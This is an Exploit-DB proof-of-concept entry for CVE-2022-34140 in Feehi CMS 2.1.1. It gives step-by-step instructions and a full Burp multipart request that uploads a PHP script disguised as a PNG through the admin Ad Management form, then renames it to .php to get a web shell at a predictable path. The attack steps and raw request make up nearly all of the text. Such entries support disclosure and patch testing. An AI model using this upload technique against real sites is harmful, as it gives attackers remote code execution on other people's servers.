Feehi CMS 2.1.1 - Remote Code Execution (Authenticated)

EDB-ID:

51018


Author:

yuyudhn

Type:

webapps


Platform:

PHP

Date:

2022-09-23


# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 22-08-2022
# Exploit Author: yuyudhn
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Docker
# CVE : CVE-2022-34140



# Proof of Concept:
1. Login using admin account at http://feehi-cms.local/admin
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php

# Burp request example:

POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
Host: feehi-cms.local
Content-Length: 1530
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://feehi-cms.local
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D

Connection: close



------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="_csrf_backend"



FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[name]"



rce

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[tips]"



rce at Ad management

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[input_type]"



1

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[ad]"





------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"

Content-Type: image/png



<?php phpinfo();



------WebKitFormBoundaryFBYJ8wfp9LBoF4xg

Content-Disposition: form-data; name="AdForm[link]"





--------------